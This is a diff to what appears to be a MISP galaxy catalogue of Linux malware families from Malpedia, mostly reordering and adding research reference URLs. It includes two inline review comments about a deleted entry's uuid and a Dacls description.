"https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/", "https://www.intrinsec.com/alphv-ransomware-gang-analysis/", "https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3", - "https://twitter.com/sisoma2/status/1473243875158499330", - "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", - 
"https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html", - "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive", - "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/", - "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/", - "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/", - "https://securelist.com/a-bad-luck-blackcat/106254/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html", - "https://www.forescout.com/resources/analysis-of-an-alphv-incident", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://securelist.com/new-ransomware-trends-in-2022/106457/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", - "https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/", - "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/", - "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/", - "https://blog.group-ib.com/blackcat", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://killingthebear.jorgetesta.tech/actors/alphv", "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous" + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + 
"https://www.forescout.com/resources/analysis-of-an-alphv-incident", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html", + "https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/", + "https://securelist.com/a-bad-luck-blackcat/106254/", + "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/" ], "synonyms": [ "ALPHV", 
@@ -3759,35 +3895,35 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter", - "https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/", - "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html", - "https://twitter.com/VK_Intel/status/1423188690126266370", - "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", - "https://us-cert.cisa.gov/ncas/alerts/aa21-291a", - "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", - "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/", - "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://twitter.com/GelosSnake/status/1451465959894667275", - "https://blog.group-ib.com/blackmatter#", + "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", + 
"https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", - "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + "https://us-cert.cisa.gov/ncas/alerts/aa21-291a", + "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", + "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", + "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/", + "https://twitter.com/GelosSnake/status/1451465959894667275", + "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/", + "https://blog.group-ib.com/blackmatter#", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", "https://blog.group-ib.com/blackmatter2", "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://www.youtube.com/watch?v=NIiEcOryLpI", - "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - 
"https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/" + "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/", + "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", + "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", + "https://twitter.com/VK_Intel/status/1423188690126266370", + "https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf", + "https://www.youtube.com/watch?v=NIiEcOryLpI" ], "synonyms": [], "type": [] 
@@ -3810,6 +3946,20 @@ "uuid": "a30aedcc-562e-437a-827c-55bc00cf3506", "value": "Blackrota" }, + { + "description": "According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blacksuit", + "https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/", + "https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5bdbeaae-0def-4547-9940-33ad94060955", + "value": "BlackSuit (ELF)" + }, { "description": "According to Mandiant, this malware family is attributed to potential chinese background and directly related to observed exploitation of Fortinet's SSL-VPN (CVE-2022-42475). There is also a Windows variant.", "meta": { @@ -3846,9 +3996,9 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.botenago", "https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits", "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux", - "https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github", + "https://lifars.com/2022/01/newly-found-malware-threatens-iot-devices/", "https://www.nozominetworks.com/blog/new-botenago-variant-discovered-by-nozomi-networks-labs/", - "https://lifars.com/2022/01/newly-found-malware-threatens-iot-devices/" + "https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github" ], "synonyms": [], "type": [] 
@@ -3861,16 +4011,22 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor",
- "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game",
- "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
- "https://twitter.com/cyb3rops/status/1523227511551033349",
+ "https://unfinished.bike/fun-with-the-new-bpfdoor-2023",
+ "https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html",
+ "https://twitter.com/CraigHRowland/status/1523266585133457408",
+ "https://troopers.de/troopers22/talks/7cv8pz/",
+ "https://www.mandiant.com/resources/blog/chinese-espionage-tactics",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor",
 "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/",
 "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896",
- "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
- "https://twitter.com/CraigHRowland/status/1523266585133457408",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor",
+ "https://www.bleepingcomputer.com/news/security/stealthier-version-of-linux-bpfdoor-malware-spotted-in-the-wild/",
 "https://elastic.github.io/security-research/intelligence/2022/05/04.bpfdoor/article/#",
- "https://troopers.de/troopers22/talks/7cv8pz/"
+ "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game",
+ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf",
+ "https://twitter.com/cyb3rops/status/1523227511551033349",
+ "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
+ "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
+ "https://nikhilh-20.github.io/blog/cbpf_bpfdoor/"
 ],
 "synonyms": [
 "JustForFun"
@@ -3898,12 +4054,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bvp47",
- "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf",
- "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
- "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group_ii.en.pdf",
- "https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/",
 "https://www.bleepingcomputer.com/news/security/nsa-linked-bvp47-linux-backdoor-widely-undetected-for-10-years/",
- "https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html"
+ "https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/",
+ "https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html",
+ "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group_ii.en.pdf",
+ "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
+ "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -3955,10 +4111,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked",
- "https://blogs.cisco.com/security/linuxcdorked-faqs",
 "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html",
- "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/",
 "https://www.symantec.com/security-center/writeup/2013-050214-5501-99",
+ "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/",
+ "https://blogs.cisco.com/security/linuxcdorked-faqs",
 "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/"
 ],
 "synonyms": [
@@ -4013,8 +4169,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos",
- "https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html",
- "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/"
+ "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/",
+ "https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html"
 ],
 "synonyms": [],
 "type": []
@@ -4054,8 +4210,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.clop",
- "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
 "https://www.helpnetsecurity.com/2023/02/07/cl0p-ransomware-decryptor-linux/",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/",
 "https://www.sentinelone.com/labs/cl0p-ransomware-targets-linux-systems-with-flawed-encryption-decryptor-available/"
 ],
 "synonyms": [
@@ -4073,9 +4230,9 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper",
 "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf",
 "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
 "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
 ],
 "synonyms": [
 "Snoopy"
@@ -4085,24 +4242,40 @@
 "uuid": "0b1c514d-f617-4380-a28c-a1ed305a7538",
 "value": "Cloud Snooper"
 },
+ {
+ "description": "ConnectBack malware is a type of malicious software designed to establish unauthorized connections from an infected system to a remote server. Once a victim's device is compromised, ConnectBack creates a covert channel for communication, allowing the attacker to remotely control and gather sensitive information from the compromised system.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.connectback",
+ "https://labs.sucuri.net/signatures/malwares/pl-backdoor-connectback-001/"
+ ],
+ "synonyms": [
+ "Getshell"
+ ],
+ "type": []
+ },
+ "uuid": "82c57d1b-c11b-44f7-9675-2f0d23fb543f",
+ "value": "ConnectBack"
+ },
 {
 "description": "Ransomware",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.conti",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware",
 "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
- "https://www.youtube.com/watch?v=cYx7sQRbjGA",
- "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
 "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
- "https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
+ "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf",
 "https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
+ "https://securelist.com/new-ransomware-trends-in-2022/106457/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru",
+ "https://www.youtube.com/watch?v=cYx7sQRbjGA"
 ],
 "synonyms": [
 "Conti Locker"
@@ -4112,26 +4285,13 @@
 "uuid": "c1ab8323-ce61-409a-80f3-b945c8ffcd42",
 "value": "Conti (ELF)"
 },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.corona",
- "https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "591b15c3-ab72-49ce-981a-e6e21e506e52",
- "value": "Corona DDOS Bot"
- },
 {
 "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer",
- "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/",
- "https://github.com/pooler/cpuminer"
+ "https://github.com/pooler/cpuminer",
+ "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/"
 ],
 "synonyms": [],
 "type": []
@@ -4144,9 +4304,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r",
- "https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/",
 "https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/"
+ "https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html"
 ],
 "synonyms": [
 "CriptTor"
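Review bot: The `Corona DDOS Bot` element, uuid `591b15c3-ab72-49ce-981a-e6e21e506e52`, is deleted outright rather than retained, so any `related` entry elsewhere in the galaxy that names that `dest-uuid` becomes dangling, and consumers that already imported the element get no signal that it was retired. Before merging, it would be worth searching the other cluster files for that uuid and, if anything points at it, keeping the element with its uuid and references instead of dropping it. The cpuminer and Cr1ptT0r hunks on this line only reorder refs.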
@@ -4174,21 +4334,21 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cyclops_blink",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a",
- "https://www.justice.gov/opa/video/attorney-general-merrick-b-garland-announces-enforcement-actions-disrupt-and-prosecute",
- "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation",
- "https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py",
- "https://www.shadowserver.org/news/shadowserver-special-reports-cyclops-blink/",
- "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
 "https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/",
- "https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/",
+ "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation",
+ "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyclops-blink-sets-sights-on-asus-routers/Appendix_Cyclops%20Blink%20Sets%20Sights%20on%20ASUS%20Routers.pdf",
- "https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/",
- "https://www.justice.gov/opa/press-release/file/1491281/download",
- "https://www.theregister.com/2022/03/18/cyclops_asus_routers/",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a",
 "https://attack.mitre.org/groups/G0034",
- "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html"
+ "https://www.theregister.com/2022/03/18/cyclops_asus_routers/",
+ "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html",
+ "https://www.justice.gov/opa/video/attorney-general-merrick-b-garland-announces-enforcement-actions-disrupt-and-prosecute",
+ "https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py",
+ "https://www.justice.gov/opa/press-release/file/1491281/download",
+ "https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/",
+ "https://www.shadowserver.org/news/shadowserver-special-reports-cyclops-blink/",
+ "https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/"
 ],
 "synonyms": [],
 "type": []
@@ -4197,19 +4357,20 @@
 "value": "CyclopsBlink"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.\r\n\r\nResearch shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
 "https://blog.netlab.360.com/dacls-the-dual-platform-rat/",
- "https://www.sygnia.co/mata-framework",
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
 "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+ "https://www.sygnia.co/mata-framework",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://vblocalhost.com/uploads/VB2021-Park.pdf",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
 ],
 "synonyms": [],
 "type": []
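Review bot: The new Dacls description ends with PCrisk's advice to end users, `In any case, no RAT is harmless and should be uninstalled immediately.`, which is consumer guidance rather than a characterization of the family and reads out of place in a cluster description. Keeping only the first paragraph (RAT, Lazarus attribution, Linux and Windows targets) preserves the substance the source provides; the rest of the hunk only reorders and extends the refs list.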
@@ -4222,11 +4383,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark",
- "https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities",
- "https://twitter.com/ESETresearch/status/1440052837820428298?s=20",
- "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx",
 "https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx",
- "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/"
+ "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx",
+ "https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities",
+ "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/",
+ "https://twitter.com/ESETresearch/status/1440052837820428298?s=20"
 ],
 "synonyms": [
 "Dark.IoT"
@@ -4241,8 +4402,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.darknexus",
- "https://www.stratosphereips.org/blog/2020/6/8/dark-nexus-the-old-the-new-and-the-ugly",
- "https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html"
+ "https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html",
+ "https://www.stratosphereips.org/blog/2020/6/8/dark-nexus-the-old-the-new-and-the-ugly"
 ],
 "synonyms": [],
 "type": []
@@ -4255,59 +4416,59 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside",
- "https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/",
- "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/",
- "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime",
- "https://www.youtube.com/watch?v=qxPXxWMI2i4",
- "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside",
- "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
- "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
- "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
 "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
